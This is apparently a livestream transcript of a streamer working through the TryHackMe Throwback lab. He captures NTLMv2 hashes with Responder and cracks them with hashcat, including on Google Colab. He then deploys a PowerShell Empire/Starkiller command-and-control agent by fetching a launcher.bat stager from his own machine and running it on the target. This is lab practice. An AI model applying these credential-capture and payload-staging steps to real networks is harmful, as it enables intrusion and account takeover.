Let's go off in the deep end and not immediately look at what the page is sort of telling us. Can I just search for LLMNR in their example stuff? Example hashes. Nope. Not going to tell me whatsoever. I'll zoom way in. NTLMv2? NTLM. NTLMv2. NTLMv2 looks the most like what we're dealing with. That is a long string. The course notes recommend 1000, but that's just a basic hash, isn't it? Am I not understanding that? Or is that just this thing? Oh yeah, NTLMSSP. That makes sense to me. "The one that you teach recommends 5600." Also, why do I have two different hashes? Is that just salt doing weird things? Using rules. Excuse me. "OneRuleToRuleThemAll is a large rule list containing more than 50,000 rules, making it much more effective than creating your own list." Do I need to use those rules? Is it not going to crash? Oh, I follow. The mode 1000 is for the one that we saw earlier, the Security Center one. So let's get back to where we were working and let's see what we can do. Throwback, I have it in the README, I think. I have it in hosts: prod, firewall. It was this guy. Hey, thanks for the raid. I don't know what that means. And let's use the little hashcat -m 1000, hashes, and rockyou.txt. Do I have to specify a -w here? Just do it. Oh, sorry, /opt/rockyou.txt. Hello, raiders. Welcome, everybody. I have no idea what's happening. You guys are all excited. Oh, heck yeah. Somebody who's streaming can send their users to their channel. Well, thanks so much, everybody. I appreciate you coming to hang out. I'm about to run hashcat, so let's see if the entire stream crashes. hashcat is still starting. Thanks, rwxrob. I have no idea who that is. I'm so sorry. I'm just being real, guys. Bam, hashcat cracked it. Security Center, that's the one. Okay, now let's do the NTLM hash. So we were in PROD, right? Let's create a hashes.txt file with what we got from Responder. Does this need to be in a specific format? hashcat will tell me.
Yes, we already had that password. I'm sorry, California. That was just for, excuse me, my learnings. Just for my knowledge. And so it's admin at a specific host, I'm assuming, and then that's seemingly salt with all of the noise. So it's totally fine, the way that it is. Except the Throwback stuff doesn't really need to be in there. Wait, what? This has a couple extras. How does that go? Let's get the rules, first of all. Are you giving me a raw text file? Okay, leave it all in. "John, try using Colabcat if you don't have a good GPU. Otherwise, we're gonna wait for a long time." Let's find out. You know what? Internet's choking right now, apparently. Or maybe this file is just fucking massive. It sounds like it is. So let's actually put this in /opt, because this sounds like it's going to be something that I should use more often. wget OneRuleToRuleThemAll. Downloads very, very quickly. CTF, TryHackMe, throwback. cat hosts, prod. And that is the real hash. So I will use hashcat with that, -m 5600, right? Sanity check on that real quick. Yep, 5600. Hashes with rules, /opt/OneRuleToRuleThemAll and rockyou.txt. Please do your thing. Oh, no, sorry. I need to supply that at the end there. And the --force flag. And "Separator unmatched, no hashes loaded." Is that format wrong? I'm sketched out about that format, not gonna lie. It was telling me about the rules, though. I feel like I probably should have read something a little bit more thoroughly, but you guys were scaring me. Cracking NTLMv2 hashes. Appending a word uses an op. Oh, yeah. Okay, I understand the rules. Debug mode, debug mode. But that format's not right. We already got that one, the Security Center one. "You never had an issue with it before." Do I need to just, like, switch up this syntax here? Hashes and then /opt/rockyou. Oh, that is the thing. I've actually seen that before. I actually ran into that problem the last time I used hashcat in, like, a video recording.
If you supply those other arguments, you do have to have the things that you're actually gonna use after the fact, after your options. Initializing device kernels in memory. I don't understand what's happening. Dictionary cache hit. I don't think I've seen the kernel panic yet, so that's good. Checking out status with S shows me that we're just doing stuff. Should I go try and use the Colab? It's doing its thing. It's cranking along. It looks like if I hit S, if I tap that... Oh, video is cracking. Oh, shit. Okay, all right. I stopped it. Let's go use Colabcat. Let's learn that real quick, because I have, reportedly, 10 days to go. All right, all right, all right. You guys are telling me go to stinkin' Colabcat, so let's do that. How do I do this? "Run hashcat on Google Colab. Go to the link below to open a copy of Colabcat in Google Colab. Click on Runtime, Change runtime type, and set hardware accelerator to GPU." All right, I can read so far. So Runtime, Change runtime type. Hardware accelerator to GPU. That looks like it's set. I'll zoom in a little bit on that so you guys can actually see it. "Go to your Google Drive and create a directory called .hashcat with a hashes subdirectory where you can store hashes." I'm gonna move this up, actually, out of view, so you guys don't see my Google Drive. Cause OPSEC, you know what I'm saying? And bear with me a little bit, sorry. Guinness World Record for longest stream. Dude, I am just getting started. Girlfriend is on night watch. So I'm here for the long haul. Folder upload, I don't want to upload. I want to create a new folder. Hey, thanks so much for hanging out, code beta. I really appreciate you guys chilling with me. I hope you had some fun and learned a little bit. That's what we're here for. They wanted me to call this .hashcat, .hashcat, create a new folder and a subdirectory. "Create new folder hashes where you can store hashes. Come back to Google Colab, click on Runtime and Run all."
Okay, this little bug is being loaded from that thing. Do it anyway. Okay, enter my authorization code. I'm gonna move this browser up so you guys don't see that in case it's anything wonky. This is new, uncharted territory for me. So I mean, yeah, I haven't actually used Colabcat before, so I'm also in the weirdness. What, what, what? Why'd you give me an invalid auth code? Sorry, I realized you're kind of blind to this. I'm confused. Can I... I'll pull this down. "When it asks for a Google Drive code, you can go to the link and authenticate with your Google account to get the token. You can edit the last cells in the notebook to customize the wordlist downloads and the type of hash it cracks. The full list of these can be found here. If needed, simply type bash in a new cell to get shell access to the instance." Okay, let's create a... can I just run that? Yeah, okay. What? Can I not see this? That's weird. cd content, cd .hashcat. cd .hashcat. Mm, I'm sketched out. content, cd sample_data, ls. Can I not just kind of, like, put files in here? Am I doing this wrong? Or should I have, like, done all this? I'll let this try again. I think this needs to, like, actually execute just fine. Yeah, it should take the hashes from, like, Google Drive. So I made those subdirectory structures. Can I stop this one? I don't want that to run, but I want this one to run. You're currently executing. Oh man. I don't know what you're doing. I guess I need to stop that thing. Yeah, okay. And it needs me to go do this silly authorization thing again. Okay. Please do it. Please copy this code. Copy, paste it. Is there an enter button? Yeah, it looks like it is syncing, but it just fails. So I'll show you this. "This will ask you to go to a link and get another authorization code. The .hashcat folder gets synced into your Google Drive and makes a symbolic link between the Google Drive and it." Apparently wrong. But why? But why? Who am I logged in as right now? I'm regular John.
I'm not work John. Do it again. This is gonna be, like, my third time trying this. I know I'm using a different auth code each time. So I just copied it from a different page. I will slap that in. And I don't see anything else. So I just hit enter and it tells me that's wrong. So I don't know. I think I'm gonna bite the bullet and just try and do this hashcat. Like, can we trust it? Can we give it a little bit of time? Can you tell me if this stream starts to go to shit? But let's do it. "Try CrackStation?" Seriously? Would that work? There's no way. Oh, okay. Yeah, so, like, now I see it. I'm looking at the preview and I see the stream going crazy. I mean, that's better than nothing as long as the audio isn't horrendous. I hope you don't mind me just being a robot more than usual. We can try and go to CrackStation, though, I think. Audio is good. Cool, I appreciate you guys. Thanks. Let's close out some of this stuff. Let's try CrackStation. And I'm sure, I have faith that hashcat will be able to crack it soon enough. Yeah, if you're only here for the audio, then hell. Just leave this on while you're going to bed. Except for when I'm screaming and laughing and having a great time because of you guys, it's all too much fun. Can this just straight up do it? Like, there's no way. "Which can't handle the leetness." I don't think CrackStation would be able to solve this. "I'm gaming and listening, basically." Wow, you guys are fantastic. I appreciate you all listening in, even while you're doing your life. Is that how it normally is for Twitch people? Like, I wouldn't be able to, because whenever I want to watch an Optional stream or The Cyber Mentor's stream or NahamSec's stream, I'll have to sit down and watch it. So, yeah, if CrackStation requires the NTLM, is that the very, very last part? Like the big, big long thing? Or is it the two pieces in the front, these two hex pieces? No, I mean, obviously all of it is hex. That's probably a very useless thing to say. I don't know.
Come on, hashcat. You've got this, buddy. Wow, watching three YouTube videos, two Twitch streams, and playing an FPS. You guys are insane. The smooth jazz radio voice, I appreciate that. So, my dad, my father, like, my IRL dude, my father owns a radio station. Some fun facts. Originally, he owned an easy listening smooth jazz radio station. And then it became oldies, like old-school songs and music. And then it became, I think, news and talk radio. So, when I was a kid... I would do, I mean, I guess I am still a kid. When I was younger, I would do events with the Kiwanis Club and the public service, community service stuff. So, I got to be on the radio a little bit just to talk about some of those things, but I guess that's where... the stream is lagging. Is it audio or? I'm pretty sure my Dell XPS 15 does have a GPU. I know I use... yeah, I can show the status of hashcat. I'm on live PayPal. Sorry, yeah, video is probably, like, crapping the bed. I'll press status every now and again. 10 days remaining. We've been going for four and a half minutes. Yeah, why don't I just have a separate cracking server? Jaxi, is that really how long it's gonna take? Serylix, I know you've been, like... oh, Serylix, we're going for longest stream, boys. Here we go. 24 hours I can't do. I could do, like, 11 hours. Oh, Wester said, holy shit. Is that because I could do 11 hours? I don't really want to. Yeah, sorry, the stream is lagging because I'm actively trying to crack a hash. Sorry. I'm sorry. Colabcat is my best option. Okay. So we have a clear diagnosis, though, that this is going to take more than 10 minutes. Is that fair to say? I think it's worth learning Colabcat. Oh, and now the lag is just straight up gone. "Or a huge GPU machine on Amazon." That's the thing, that's an option. I could spin up some of my GCP, Google Cloud. Okay, Serylix has given me the yes. This is certainly going to take more than 10 minutes. Now we're at 15 FPS. I guess I can just, like, stop this then.
Can I serenade you? Yeah. I can do, like, a stupid radio intro. You guys will laugh about being on the... all right, I stopped hashcat, so... I guess now I have to go figure out Colabcat or get us a different machine. So let's try that. I'm sorry, I just like seeing others suffer. Let's just go back to trying this, I guess. Yeah, back to smooth-as-butter livestream, I hope. Anyway, "check the GPU specs, please." Run anyway, get hashes to crack. "Go to this page in your web browser." I'll do it. Ah, oh no. Realistically, I guess you don't actually need... I guess I don't exactly need to, like, hide this thing from you. Enter my authorization code. Where is the input box to actually copy that and paste that, please? The offset goes brr. You guys know my email address. I put that thing everywhere. Run, paste, enter. Please, God, please. Oh my gosh, it did it. All it took was an extra attempt for some reason. Yeah, now compile hashcat. Do I need it? No, I don't need to put an input in here. Come on, hashcat. Now we're using those sweet, sweet cloud resources. So, hey, what do we need to do to, like, amp up the stream here? Like, what would you guys want in a Twitch stream to make this more fun and make this right? Like, obviously it'd be good to spread the word. It'd be good to, like, okay, scream about this on Twitter and LinkedIn and Instagram and try to drive some hype to doing this sort of thing. "Keep Colabcat up for future use as well." Roger that. Thank you, Serylix. Good to know. Am I pronouncing that right, by the way? I'm very sorry if I... Yeah, yeah, doing it more often. Yeah, absolutely. I hope to do this more often. We'll see how I can balance my sleep schedule. The past couple of days, we have been trying to stay up to prepare for her night watch. So, the other day we stayed up until two in the morning, and then yesterday we stayed up until four in the morning, because you're gonna have to be up till seven in the morning now. So, unlock subs.
Yeah, how do I do that? What do I need to do to get subs or whatever? "I hope you do this often, but earlier." Yeah, we'll see. What else? Serylix, roger. Thank you. I'm very sorry. Gotta get affiliate. That'd be cool. I'm not, like, gung-ho about it, you know? I don't think I am. I'm not a... It's weird to me. I'm out of my element because I'm not, like, a streamer, you know? I'm not a Twitch streamer. Oh yeah, it says on your dashboard how close to affiliate you are. Creator dashboard. Let's go find out. Is this thing done? Are you still compiling hashcat? Yeah, okay, good. Insights, channel analytics. Twitch affiliate needs to have at least eight hours broadcast in the last 30 days. Oh, we're gonna get that done tonight, guys. At least seven unique broadcast days in the last 30 days. Roger. An average of three concurrent viewers or more over the last 30 days, and 50 followers. I think I have more than 50 followers. I think we have more than three concurrent viewers. Orpheus, thank you, man. I appreciate the follow. Is hashcat done? I feel like it's done. Was it just done and it just didn't tell me? I'm sorry. I'm sorry. hashcat version. Okay. Do I need to do that? mkdir wordlists. Yeah, the unique broadcast one is basically if I stream seven times within 30 days. Yeah, yeah, yeah. Thanks so much, Cortex. I really appreciate it. I'm grateful for all the nice words. Okay. So we need to get this rules thing into the Google Drive, and the hashes that we're trying to crack, and rockyou. So if I go to Google Drive, I'm gonna move this over here so you guys still can't see it. "Status of cracked?" What are we referring to? I've been trying to get content out lately, and I had a good streak going on for, like, the past couple of days. I was super duper proud of myself because I was like, sweet. We got a video, like, every day for the past two weeks. This never happens. And that was a blast. And then I broke it, like, two days ago.
Oh, it already downloaded SecLists, which has rockyou. Roger that. Oh yeah, it does, doesn't it? Well, I need to get these hashes on the box or in there. So I can bring this down, I think, now. I think this is safe. Can I click in that, please? Yeah, I appreciate you checking out the Google CTF videos. Those seem to be really well received. So I hate going back to my terminal because I see the hashcat output and I'm like, gosh, if only it had solved it. If only it cracked it. Upload, please? Upload, pretty please? Gosh, can I please click on this? Why does it not do anything? "You're getting an invalid link for the Discord." What are you opening? .hashcat. Why does Google Drive not open any of the folders that I'm clicking? Sorry, getting kind of irritated at that. That's annoying. Can I search for hashes and just get there? I mean, yeah, I guess I could just kind of echo that in there. Does that thing have internet connectivity? Because I'm gonna need to download that. Yeah, that's a good point. That's a good point. Let me bash. Please go. Here I am. Okay. And I apparently still can't see anything that I type. So hashcat. Let me move this up for just a quick second before I just get a sanity check that you're not seeing anything in my Google Drive. cd to that location that is mine. Unless there's a lot of stuff in there. .hashcat and hashes. Good. Okay, now I'm in that directory. Now where did they stinkin' put... oh, that's not helpful whatsoever. Where did they stinkin' put rockyou? Is that in sessions or whatever? I guess I can go take a look where they actually put that in the previous cells. You wanna see the feed pictures? Oh, it's in root, under wordlists. Okay, that makes sense. Well, let's see how much, if I was able to successfully hide bad content. I think you saw some of them already. Wait, the what? ls root. Do I have wget? I do have wget. All right, let's get this. This is agonizing, guys.
I'm really sorry that this has taken way too long. "I think you can get a reverse shell from that." What? I mean, I guess I could do it. That might behave a little bit better. That might be easier for me to get into or look at, actually interact with this thing. So I need the rules and I need rockyou. wget. Paste. Great. We've got the rules. Now let's get the hash. Hashes. Oh dear God. Oh dear God. It was this thing. It was this big thing. Okay. Then let's get back to our browser, wherever the heck it is. Let's close out the other stuff that we don't need currently and let's echo all of this into a hashes.txt. ls. Can I cat out that hashes.txt? And that's the whole thing. Okay, great. Now I want rockyou. And it was probably in SecLists. Oh, that's just a straight-up link. Copy link location. Let's download that. wget this bad boy. Excuse me. That was probably... dang it. I need you to copy the link location, not that link. Copy link location. I don't want that. I want the real link, not the Google redirect link. You know what? Fine. Fine. We'll do a little F12 here. Check out that Network tab. Stop, please. Network. And we'll get that GET rockyou. I think that's literally it. Please, please, please copy that line. Holy cow. Can I have the line, please? We did it, guys. We copied and pasted it successfully. Okay. Okay. "He's beginning to leet." Oh, I'm nowhere near leet enough. And that's the problem. We've been struggling to run hashcat on a cloud computer that will work for us. We got rockyou.txt. Let's remove that stupid URL crap. I'm just gonna wildcard that and hopefully not remove literally everything in the drive. Thank you. Okay. Is hashcat a command that I can run? hashk is not a command that I can run. How about hashcat? If I could actually see what I'm typing. Amazing. Let's get back to our terminal and grab the syntax here. You know what?
Let me actually modify that a smidge because I literally can't see a darn thing when I run the command. So it looks like we need hashcat -m 5600 to run NTLMv2, run with the rule OneRuleToRuleThemAll, hashes.txt and rockyou.txt. And I guess we don't need --force anymore. Yeah. See, I really wish I had done the reverse shell. I'll have to try and see if that works. Actually, let's, part of me wants to do it now. Just start hashcat on, who cares. Alrighty. There he goes. He's doing it. Did it do it? I'm confused. Whoa. He cracked it. That was a much better solution. We finally did it. All the way, all the way, all the way, all the way, all the way, all the way at the end. We should have a cracked password. And it is Throwback317. Wow. Oh, when I ran it locally, I was stuck on 0.03%. Are you kidding me? Wow. Okay. Now we can put that. Yeah, sweet. I want, I'm very pleased we did that. Thanks so much for making me go down that route, everybody. That seemed to work really, really well. So using Responder, and that was sudo. Yeah. Definitely, definitely glad we got that figured out. Responder.py. It was -I tun0 and then -rdw and -v. We eventually caught an LLMNR request and we have that saved here. And then we were able to crack this with Colabcat, online hashcat, hashcat through Google Cloud. Sweet. We uncovered the password. Let me grab the syntax that we just used for that though. Do I have that saved? Yeah, he's right here. Sorry, frantic Sublime Text traveling. Progress. Oh my Lord, eventually we finally did it. How long did that take us, guys? We've only been doing that for like an hour. Yeah. So, so thanks. Jackson is really going on about Pentest WS. Let me pull him down and try this thing. Is there like a demo at all anywhere? I'll definitely have to keep this in mind. I probably should be using like CherryTree or something. Hey, thanks, Wester. I really appreciate you tuning in. Yeah, I'll be doing this again tomorrow. 
So if you really want to hang out for some reason, that would have been great. I'd love to see you guys tomorrow. Now that you know how to crack passwords using a wordlist, and we got it. So Throwback317. Success. Building your own Dark. Darkstar. Whoa, I get the joke, guys. I was good. Building your own Darkstar. You can't recreate him. He's too, he just can't. He's too unique. Stop scrolling. "Now that we have some footholds on our network, we need to begin to set up a command and control server to gain persistence as well as escalate privileges. Command and control server overview. A command and control server is used as an interface to upload and control various post-exploitation tools without interacting with the target itself. Consider C2 as a means for mass management of exploited targets for further usage, be it lateral movement, information gathering or otherwise." Starkiller. What? So I haven't heard of Starkiller before. I'll admit. I will admit. This is apparently a big thing though. Let me check out that. Yeah, just download that please. Let me check out this repository. What is this thing? "Starkiller is a frontend for PowerShell Empire. It's an Electron application written in Vue." Okay. "If you'd like to contribute, please follow the contribution guide," et cetera, et cetera. Great, let's just do it. So. Have we been catching any of the really cool hashes? Yeah, yeah, we've got like four more, four more NTLM hashes or LLMNR responses. Awesome. So let's make a directory for Starkiller. And let's actually move the downloaded Starkiller. Starkiller? What did that download us? Starkiller lowercase. Starkiller here. And what is this thing before I run it? Oh, it's a program. Okay, cool. I'll trust you blindly. It's already dying. Oh, wait, we got a little Gooby. Got a little Goop here. sudo, that thing, --no-sandbox. Want me to sudo it? I just downloaded this thing. You want me to sudo something I've never heard of before? Just kidding, I do it all the time. 
sudo Starkiller --no-sandbox. No sad box. It was a typo. Electron, ew, yeah, everyone was like, hey, none of it, oh no, Electron. Great, what is this? I have to log into this thing, apparently. Can I zoom in on this? No. It's okay if it's Electron if you're an attacker. That's fair, you know what, I'll buy that. And then get Empire. Do I actually have Empire? I don't think I do. Let's move up a directory. I don't think I do. All right, they give me the repository so I don't have to go there myself. Let's not do it. Oh no. Oh no, git clone Empire and setup install. And that probably needs me to be root, but are you, do you dislike doing that? Should I have registered an account with Starkiller or something? Oh, I guess he's just gonna go. I guess he's just gonna figure it out. Maybe he would run sudo commands in his install and they probably already detected that I had entered sudo earlier. So hey, thanks so much for those new followers, Wutsunatar, I appreciate that. Yeah, I remember PowerShell Empire, like everyone was at, oh no. Oh no, Empire is dead. Empire is not cool anymore. Empire is not hot, but then I think BC Security was like, no dude, it's still cool, and they just took it. So they're all about it, which is awesome because yep, yep, yep. Ooh yeah, the whole C2 Matrix is coming together. Dude, Bryson Bort, dude, Jorge Orchilles. I don't know if I'm pronouncing his last name right, but those guys are incredible. Bryson's a great guy. We tag each other for pizza Friday on Twitter all the time. If you guys want weekly pictures of pizza, follow me on Twitter. While this is installing, I am going to put on the "be right back" display so that I have an opportunity, be right back in three to five minutes, so that I can actually take a bio break and be human. Just a second everybody, I'll see you soon, I love you. Hello, I've returned. Kind of the problem with drinking a Monster, you know? Oh, thanks for sticking with me everybody. All right, looks like we're good, I think. 
Where'd you put this thing? Data, Empire, here we did it, you did it. I'll make that visible so you can actually see it. And let's get back to what we're doing. So, in Empire, what happened? I hit tab, I hit tab. In Empire, we have this ready, so I can sudo ./empire --rest, --rest. It's just like letting it run as like a server. Is that right? Ooh, very slick. Okay, and then it just runs. So, Starkiller, is that supposed to run in the background? I don't know, let me just do Starkiller now. I probably don't need to be having Responder on anymore. Hello everybody, it runs as a REST API, very slick. So let me go into Starkiller and do the Starkiller one more time. Do I need to sudo that? They're sudoing it, but let's do it. This is Throwback, for those of you that are just joining asking about this new room. Yeah, this is the new TryHackMe Networks that Krillix, sorry, let me properly pronounce your name. I'm very, very sorry if I keep ruining that. And then we have some default credentials for Empire: empireadmin and password. I hope that set it up as it should. Please, please, please, please. It did it, amazing. Wow, sudo everything. Yeah, sudo chmod -R 777. "If you properly set up Starkiller and Empire, you'll be met with the Listeners panel after logging in." I did that, incredible. Deploy the grunts. Okay, this is new for me. So I normally interact with Empire like through the command line, but I'll be having fun exploring Starkiller. I had nothing wrong with that. sudo vim, :!bash. "We'll begin our movement through the network with our second foothold on THROWBACK-PROD. Your team has informed you that the best plan of attack is to plant a command and control agent on THROWBACK-PROD and attempt to escalate privileges before assessing other footholds and laterally moving through the network." Did I actually have access? 
Starkiller uses, so I know I got credentials because we just got petersj's password, but I didn't do any WinRM thing to get on the box. Is that something that I can do? Let me check that Nmap initial, cause I saw WinRM, WinRM 5985, there was a, there was a WinRM port open, 5985, is that right? Nmap didn't find it because I didn't do that. I didn't do a full port scan and it probably didn't check for that. Maybe, I don't know. Let's just continue to follow up. Let's go ahead and create a listener. Selecting the create listener. We will use an HTTP listener, Roger Dodger. Can you guys see this okay? I'm really sorry that this is gonna be kind of dark. HTTP, we'll run it on my localhost, not localhost, I'm sorry, but my actual tun0 IP address. Lot of shells going on. They actually had RDP open. Okay, so don't use it. Don't use RDP. Yeah, what am I doing? ip a s tun0, that's me. So I need to change my host to listen on. Bind IP should be everything. Wait, host should be ourselves, right? Yeah, and then the port we wanna listen on. So they're using 53 to do the weirdness DNS, stealthy stuff. Port, we gotta specify that. I'll go 53 just to kind of keep it as they are suggesting. And then we'll have an active listener. And it'll just do it. It'll just do the thing. Okay, excuse me. Oh, I probably need to sudo that. Wait, I did sudo that, didn't I? Address is already in use. Port 53 is already in use. What's happening? Let's go for quad six. Oh, Responder uses 53, thank you, thank you. Responder is still doing his thing. I gotcha, thank you. Now we already created the listener. So if I go back and go into Stagers, now I have a generate stager button. And that should probably be something like, okay, yeah, Windows and they're gonna use a batch script. Launcher, scroll, scroll, scroll down to Windows. windows/launcher_bat, very cool. Do they, and grab our HTTP listener that we have. They're just using PowerShell, is that right? 
"We have our stager ready to deploy to the target. Depending on the stager type you select, you will have to download or copy and paste the stager to the target machine." So, oh, they got on the box already with petersj. Should I do that with Evil-WinRM? Oh, no, we have SSH, duh. That's pretty cheesy, easy. So let's whack that guy, just make him. I can copy that, right? And let's put him in /home/john. CTF, tryhackme, throwback, hosts, prod. launcher.bat, please, please, please, please. And so that's still running as the sudo, the sudo. So that's probably created as root there. Let me just chown that, because it's sudo chown john on launcher. Can I have that, can I have that, can I have that, please? I got it, now he belongs to me, fantastic. And that's a good, good batch command that I could just whack in there. Then they just serve it and they get on the box. Let me get on the box, I'm not in there yet. I still have this firewall open. I still have a root firewall shell that I can, I guess, keep, but let's get to CTF, tryhackme, throwback. And cat the README one more time just so I can grab that IP address, production. Let's SSH to petersj. Do I have a video on how to use LinPEAS? Admittedly, I don't think I have one that explicitly defines it, like showcases it, like, I don't know, starting to use it for the very first time. I do use it in a lot of videos, and then really it's just kind of downloading it and running it. And petersj's password is Throwback317, Throw, Throwback317, am I wrong? Oh, may or may not need the, am I misunderstanding? And I'm totally cool if I am. I realize that this is kind of new for me. petersj, peters-j. Oh, thank you. Please let me out. Please let me out. Thank you, Evil-WinRM. I'm really, really grateful that you really like me, but I wanna go home. Okay, fuck. That window's dying. Thanks, SSH, yeah, yeah, yeah, let's just do SSH. Thank you. Throwback, ssh petersj. Don't forget the j, John. 
And that IP address, Throwback317, don't fat-finger it. Oh my goodness, we're on the box. I'm in. Great, let's move into C:\Windows\Temp. Can I clear screen in this? Oh, I can't, oh God. All right, time to move my face so you can actually see it. Wee, there I go, the top of the computer screen. Now I just can't Ctrl-L ever. cd C:\Windows\Temp. dir. There's nothing in there. I am in the right directory, yeah. echo a > a, dir. What? I'm confused. Am I not in a real directory right now? They just kind of did it from their home directory. And I guess I can, I guess they can just do it. Yeah, you say "I'm in" every time you get into a box. Like really cool, you'd be like, put your hoodie on. I'm in. All right, enough muffing around. And my face is in the way again, God dang it. This is why I guess you have to have the Twitch stream that's really cool, that you're over in a different aspect of the computer or the display. Great, whatever. Now let's go ahead and download this thing. I'm in PowerShell. So I am in PowerShell, am I? Am I in PowerShell? I'm not in PowerShell. Can I just run powershell, please? I can just run powershell. And now I can Ctrl-L. Life is incredible. Bring my face back down. Thanks for hanging out, everybody. Now, let me just sanity check. I'm sorry, I just wanna see, is that just not a directory? Oh, I just don't have access to it. Whatever. User profile. Okay. Back in the home directory. Let's get this launcher ready and let's stinking get our agent running. So we put this in hosts/prod and then let's python -m http.server. Great. And then let's wget, which we do have because now we're in PowerShell. So it's an alias for Invoke-WebRequest. Ooh, that's a good call, Jaxi. If I'm butchering your name, also please forgive me. Is that Jaxi Muke? Yeah, I know Krillix, so many shells. I'm stupid. HTTP, what the? Oop, is my IP address. Every single time, I don't know. This guy. wget him, port 8000. 
Let's go to, oh God, what, what, what, what happened? Terminator? No, no, it's the curse. As soon as Krillix says that there's too many shells, Terminator just crashes. Cause we're running Responder? Oh my God, I've never seen that happen. That's never happened. Cool, cool. Are we still in, is our VPN connection like still alive? Yeah, F in the chat. All right, let's get some petersj action back. What, and friggin' Starkiller's gone. Oh my gosh. No, are you kidding? We gotta do it all over again. Yeah, Terminator was like, no more of this shit, John. All right, let's get Empire back in action, apparently. Same with Starkiller. Is this all still there though? Oh no, oh yeah, --no-sandbox. Forgot that, forgot that argument. Starkiller's back and we still have a listener and we still have a stager. Okay, so that's actually all good. Empire's still with us. He's got one listener rolling, so I can't get over that. Wow, that was nice. Terminator, I don't think it actually has a screen limit. I like, it's weird. I feel like Responder just gave up. He's like, you know what? I'm not doing this shit anymore. I just have kept finding the same LLMNR response over and over again. Throwback317. I'm in. You just have to say it now. And we need our, oh my gosh. What is this? Is this? Is this real life? What is it that's killing it? Holy crap. Yeah. All right, can I do a little like sudo /opt/Starkiller? Star, whatever, --no-sandbox? Will that just do it for me? Probably not. Someone says, yeah, just check top. Oof. No, I'm the only one logged in right now. As far as I can tell. All right. Let's take it old school. Let's just run a regular old terminal over here. And let's fire up tmux because the internet's mad at me and keeps telling me to use tmux. So let's friggin' install tmux. We're having fun, ladies and gentlemen. That's what you do on a Twitch stream. Yeah, so much for persistence. Well, this video recording is still going on. 
And I guess we've been going for like three hours and 22 minutes, so. Yeah, exactly. Like I've never seen Terminator just choke. Alrighty. /opt. Is Empire just still running? Like, do I need to start that again? It was on 1337, right? I don't know if he is. It's going to Empire. sudo ./empire. He doesn't need anything funky, does he? Oh shoot, he needs to be running as --rest. And tmux. Okay. Ctrl-B N. Ctrl-B C. That's it. Ctrl-B 0. Now I got two windows open. Ctrl-B N. How do I rename? Whatever. It doesn't matter. Stinking, start, Empire. sudo ./empire --rest. Yes. Oh, John's using tmux, everybody. All right, now he's running. Let's get to Starkiller. sudo ./Starkiller --no-sandbox. Please don't die. Please, please, please. Don't give up. And maybe I just need to keep the font size down. Maybe it was just blowing up. Cause of all that. Am I watching IppSec? No. He would actually be doing a good job. Okay. Now I'm not getting a response. That's not fun. Did I drop the connection? I don't know why I'm trying to sudo ping just then. Reee. Is OpenVPN still going? It's a thing, dude. He's up. He's kicking. Did that machine die? I don't think so. So what else do we got? The network, no, he's still running apparently, but I can't ping him anymore. All right, let's do a quick little bounce, maybe. Hope you guys don't mind. Try refreshing the page. Oh yeah, maybe he just kind of clobbered himself. I do it all the time. Sometimes I clobber myself. Network status stopped. I wonder if that's why Responder was like, oh no. Wow. We took so long that the network gave up on us. They said, you're clearly not gonna be able to do this. So, all right, now you're running, so you say. Now that I've killed my VPN connection, let's cd CTF/tryhackme. Oh boy. Wow. This has to be excruciatingly painful for you guys. I don't know how you could remotely enjoy watching this. The network decided to throw you back. Nice. No. 
Don't tell me it's a different password right now. Don't you dare tell me that it's a different password now. Oh my gosh. No. Am I remembering it wrong? Am I remembering it wrong? Give me back, give me back to prod. Tell me the stupid password. No. Krillix, Krillix, you're saving me. It's gotta be the same password because, right? Yeah, yeah, yeah, okay, okay. Thank you. It's gotta be the same password because that was the answer that it actually asked for. So there's no way that that's gonna change and be dynamic. It's probably just gotta take a little bit of time. Thank you for saving me. Yeah. Thank you for saving my sanity. I'll wait. I'll take some, I'll give it a little bit. So I'm probably going through this at a very, very slow pace. Is that right? Krillix, like, am I moving slow right now? I mean, obviously I'm tripping and stumbling, but how long would you expect this to take a person? Like, when you were designing this, when you were developing this, would you feel like, hey, we're in, great. Like, did you feel like this would be a day if someone were going nonstop? All right, we're in. Thanks, California. I appreciate it. THM, throwback. "I've seen most users take 20 plus hours." Okay, that's good to know. I mean, obviously I'm still, I'm sure that I'm going to get to something where like I have no idea and I do not understand what's happening. That's, that might pretty well happen. Please, please, please get me to the point where I can actually download this thing. We got so far, I was like typing this command previously and then it died. So fingers crossed, my shell does not give up on me. What did we call this thing? launcher.bat, yeah, launcher.bat. Got it, downloaded it, and it didn't save it anywhere. It just kind of made the request. You're the best, thanks so much. Do it again. That's also reading all the content in the lab. Yeah, and digesting everything we throw at you. I get that, I get that. 
Okay, so what should I see when I ./ my launcher? I am running in PowerShell, so it would make sense for me to ./ it and it'll just do the thing. "Your agent will check back in the Agents tab." Okay, so I am in the Agents tab just so I can see this happen, and let me do a little ./launcher.bat. Whack, please goodness. Please, please, please. Do I have a new IP address? Oh, no, I have an agent. Amazing, okay, okay. So, ooh, I can interact with him. I can click on him and do things. We're done, whoop whoop. My answer is correct. My "no answer needed" answer is correct. Sweet, okay. "Now that we have an agent on the machine responding with Starkiller, we can explore the command interface of Starkiller as well as the modules that Starkiller has." Is it really Empire or is it Starkiller? You know, I think Empire, is it Empire? It really, that's the engine in the background. Starkiller is kind of an interface, the frontend, right? I don't know, I probably sound like a jerk saying that. I don't mean to. "The agent can send any normal shell commands such as whoami or ls. However, that's not utilizing the full power of Starkiller." Right, it can do a lot more crazy cool stuff. PrintSpoofer? "One of the major features of any C2 server is the ability to use modules. These are typically tools or exploits like Mimikatz, Rubeus, and PrintSpoofer that can be loaded in the server through the agent. Starkiller has many modules, all with their own uses. Take some time to explore the modules menu and play with some of the modules." Okay, I'll have fun. I really wish I could zoom in on this. Oh, zoom in, plus. Ah, now you guys can actually see what I'm doing. Please enter a module name. Persistence, I'm on Windows right now, that wouldn't do much. Situational awareness, that's a big one, isn't it? I'm just gonna explore here. trollsploit, that's fun. Oh, California, thanks so much. I don't mean to be on your TV. What am I doing? Look, I'm on TV. 
